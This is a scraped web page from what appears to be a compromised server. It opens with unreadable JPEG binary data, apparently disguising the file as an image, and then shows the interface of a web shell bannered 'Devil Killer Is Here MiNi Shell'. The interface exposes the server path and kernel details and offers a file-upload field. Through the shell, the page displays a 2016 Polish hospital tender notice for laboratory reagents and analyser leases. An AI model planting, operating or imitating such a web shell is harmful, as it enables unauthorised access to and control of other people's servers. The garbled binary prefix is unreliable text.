JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160606/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160606/71389-N-2016.html

<p class="kh_header"><b>Przemyśl: Dostawa odczynników i materiałów do diagnostyki laboratoryjnej oraz histopatologii i cytologii wraz z dzierżawą sprzętu i / lub aparatury</b><br>
<b>Numer ogłoszenia: 71389 - 2016; data zamieszczenia: 06.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital im. św. Ojca Pio w Przemyślu , ul. Monte Cassino 18, 37-700 Przemyśl, woj. podkarpackie, tel. 16 6775065, faks 16 6775064.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa odczynników i materiałów do diagnostyki laboratoryjnej oraz histopatologii i cytologii wraz z dzierżawą sprzętu i / lub aparatury.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zad. 1 - zestawy odczynnikowe i materiały do badań morfologii krwi wraz z dzierżawą analizatora hematologicznego  -  10 poz. asort. w różnych ilościach;  Zad. 2 - materiały i wieloparametrowe testy paskowe do analizy moczu na aparacie LabUReader Plus (firmy 77  ELEKTRONIKA)  , materiałów zużywalnych i części zamiennych oraz serwisowanie aparatu LabUreader Plus ( firmy 77 ELEKTRONIKA )  -11 poz. asort. w różnych ilościach; Zad. 3- szybkie testy diagnostyczne oraz odczynniki i materiały do badań laboratoryjnych - 32 poz. asort. w różnych ilościach; Zad. 4- odczynniki do badań z analityki ogólnej i hematologii- 12 poz. asort. w różnych ilościach; Zad. 5 - materiały do badań laboratoryjnych - 10 poz. asort. w różnych ilościach; Zad. 6 -zestawy odczynnikowe i materiały do analizatorów Vidas  z dzierżawą kompatybilnego analizatora - 37 poz. asort. w różnych ilościach;  Zad. 7 - lateksowe testy diagnostyczne - 8 poz. asort. w różnych ilościach; Zad. 8 - testy do wykrywania antygenu grupy prątków gruźlicy Mycobacterium tuberculosis complex z hodowli w podłożu płynnym - 1 pozycja asort. w ilości 50 szt; Zad. 9 - materiały kontrolne do RKZ i papierków wskaźnikowych - 6 poz. asort. w różnych ilościach; Zad. 10 -podłoża do diagnostyki gruźlicy - 8 poz. asort. w różnych ilościach;  Zad. 11-testy do oznaczania kalprotektyny w kale oraz testów do wykrywania Clostridium difficile - 2 poz. asort. w różnych ilościach; Zad. 12 - odczynniki i materiały do automatycznego analizatora parametrów krytycznych ( równowaga kwasowo - zasadowa, hemoglobina, hematokryt, oksymetria, elektrolity, glukoza, mleczany ) wraz z dzierżawą analizatora parametrów krytycznych;                                                                                       -  18 poz. asort. w różnych ilościach; Zad. 13 - testy do wykrywania antygenu Giardia lamblia w kale - 2 poz. asort. w różnych ilościach; Zad. 14 - odczynniki do histopatologii i cytologii - 15 poz. asort. w różnych ilościach; Zad.15 - materiały, odczynniki, krwinki do badań z zakresu serologii transfuzjogicznej mikrometodą żelową do posiadanego sprzętu diamed - id system-16 poz. asort. w różnych ilościach; Zad. 16 - zestawy krwinek wzorcowych do badań z zakresu serologii transfuzjologicznej - 2 poz. asort. w różnych ilościach;  Zad. 17 - spulowane krwinki czerwone grupy 0 uczulone ( opłaszczone ) przeciwciałami klasy IgG do kontroli ujemnych wyników testów antyglobulinowych -  1 poz. asort. w  ilości 24 ml.;  Zad. 18 -odczynniki do badań z zakresu serologii grup krwi -  2 poz. asort. w różnych ilościach;  Zad. 19- materiały i odczynniki do badań z zakresu serologii transfuzjologicznej - 11 poz. asort. w różnych ilościach; Zad. 20 -odczynniki monoklonalne do oznaczania antygenu D układu Rh -  3 poz. asort. w różnych ilościach;.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 24.49.63.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 20.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku nastąpi na podstawie przedstawionych przez wykonawców oświadczeń załącznik nr 4 SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku nastąpi na podstawie przedstawionych przez wykonawców oświadczeń załącznik nr 4 SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku nastąpi na podstawie przedstawionych przez wykonawców oświadczeń załącznik nr 4 SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku nastąpi na podstawie przedstawionych przez wykonawców oświadczeń załącznik nr 4 SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku nastąpi na podstawie przedstawionych przez wykonawców oświadczeń załącznik nr 4 SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy wykonawcy wg treści załącznika nr 1 SIWZ. 2. Oświadczenie ­ załącznik nr 2 SIWZ. 3. Zbiorcze zestawienie kosztów realizacji zamówienia
wg treści załącznika nr 3 do SIWZ określającego przedmiot zamówienia. 4. Deklarację zgodności zgodnie z ustawą z dn. 20.05.2010 r. o wyrobach medycznych
na podstawie art. 5 pkt.1 ­ do obrotu i używania mogą być wprowadzone wyroby medyczne oznakowane znakiem CE (Dz. U. z 2010r. nr 107 poz. 679) ­ dotyczy
wszystkich wyrobów medycznych na które składana jest oferta­ w przypadkach wymaganych prawem. 5. Dodatkowo wykonawca zobowiązany jest do złożenia
dokumentów wymienionych indywidualnie w załączniku nr 3 dotyczących przedmiotu zamówienia. Dokumenty mają być opisane, którego zadania dotyczą</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin dostawy towaru - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Na podstawie art. 144 ust.1 ustawy Prawo zamówień publicznych, Zamawiający przewiduje możliwość dokonania zmiany w umowie zawartej z wybranym
Wykonawcą polegającej na: możliwości zmiany cen wyłącznie w przypadku: a. zmiany stawki podatku VAT, przy czym w przypadku wzrostu stawki podatku VAT
lub jej obniżenia zmianie ulegnie wyłącznie cena brutto, cena netto pozostanie bez zmian, b. zmian stawek opłat celnych wprowadzonych decyzjami odnośnych
władz. możliwości zmiany terminu obowiązywania niniejszej umowy wyłącznie w przypadku: a. nie zrealizowania w okresie umowy całości przedmiotu umowy
wskutek realizacji niższych zamówień zmiana umowy wymaga aneksu. 2. Zmiany wymienione w ust. 2.1 pkt a i b następują z mocy prawa i obowiązują od dnia
obowiązywania zmienionych stawek. 3. O zmianie stawki, o której mowa w ust. 2.1 pkt a i b Wykonawca niezwłocznie zawiadomi pisemnie Zamawiającego. 4.
Dopuszcza się możliwość zmiany dotychczas zaoferowanego produktu na inny nowszej generacji, lub o lepszych parametrach niż określone w załączniku nr 1 do
umowy, przy zachowaniu dotychczasowej ceny jednostkowej brutto, za uprzednią pisemną akceptacją Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wszp.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Zamówień Publicznych Wojewódzkiego Szpitala im. Św. Ojca Pio w
Przemyślu, bud. D pok. 225.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.06.2016 godzina 10:00, miejsce: Siedziba Zamawiającego Biuro Podawcze bud. D pok. 217.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zad. 1 - zestawy odczynnikowe i materiały do badań morfologii krwi wraz z dzierżawą analizatora    hematologicznego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zad. 1 - zestawy odczynnikowe i materiały do badań morfologii krwi wraz z dzierżawą analizatora    hematologicznego -  10 poz. asort. w różnych ilościach;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.49.63.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy towaru - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zad. 2 - materiały i wieloparametrowe testy paskowe do analizy moczu na aparacie LabUReader Plus (firmy 77  ELEKTRONIKA)  , materiałów zużywalnych i części zamiennych oraz serwisowanie aparatu LabUreader Plus ( firmy 77 ELEKTRONIKA ).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zad. 2 - materiały wieloparametrowe testy paskowe do analizy moczu na aparacie LabUReader Plus (firmy 77  ELEKTRONIKA)  , materiałów zużywalnych i części zamiennych oraz serwisowanie aparatu LabUreader Plus ( firmy 77 ELEKTRONIKA ) -11 poz. asort. w różnych ilościach;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.49.63.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy towaru - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zad. 3- szybkie testy diagnostyczne oraz odczynniki i materiały do badań laboratoryjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zad. 3- szybkie testy diagnostyczne oraz odczynniki i materiały do badań laboratoryjnych - 32 poz. asort. w różnych ilościach;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.49.63.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy towaru - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zad. 4- odczynniki do badań z analityki ogólnej i hematologii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zad. 4- odczynniki do badań z analityki ogólnej i hematologii  - 12 poz. asort. w różnych ilościach.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.49.63.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy towaru - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zad. 5 - materiały do badań laboratoryjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zad. 5 - materiały do badań laboratoryjnych - 10 poz. asort. w różnych ilościach;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.49.63.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy towaru - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zad. 6 -zestawy odczynnikowe i materiały do analizatorów Vidas  z dzierżawą kompatybilnego analizatora.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zad. 6 -zestawy odczynnikowe i materiały do analizatorów Vidas  z dzierżawą kompatybilnego analizatora - 37 poz. asort. w różnych ilościach;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.49.63.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy towaru - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zad. 7 - lateksowe testy diagnostyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zad. 7 - lateksowe testy diagnostyczne - 8 poz. asort. w różnych ilościach;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.49.63.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy towaru - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zad. 8 - testy do wykrywania antygenu grupy prątków gruźlicy Mycobacterium tuberculosis complex z hodowli w podłożu płynnym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zad. 8 - testy do wykrywania antygenu grupy prątków gruźlicy Mycobacterium tuberculosis complex z hodowli w podłożu płynnym - 1 pozycja asort. w ilości 50 szt;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.49.63.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy towaru - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zad. 9 - materiały kontrolne do RKZ i papierków wskaźnikowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zad. 9 - materiały kontrolne do RKZ i papierków wskaźnikowych - 6 poz. asort. w różnych ilościach.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.49.63.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy towaru - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zad. 10 -podłoża do diagnostyki gruźlicy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zad. 10 -podłoża do diagnostyki gruźlicy - 8 poz. asort. w różnych ilościach;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.49.63.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy towaru - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zad. 11-testy do oznaczania kalprotektyny w kale oraz testów do wykrywania Clostridium difficile.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zad. 11-testy do oznaczania kalprotektyny w kale oraz testów do wykrywania Clostridium difficile - 2 poz. asort. w różnych ilościach;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.49.63.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy towaru - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Zad. 12 - odczynniki i materiały do automatycznego analizatora parametrów krytycznych ( równowaga kwasowo - zasadowa, hemoglobina, hematokryt, oksymetria, elektrolity, glukoza, mleczany ) wraz z dzierżawą analizatora parametrów krytycznych;.</p>
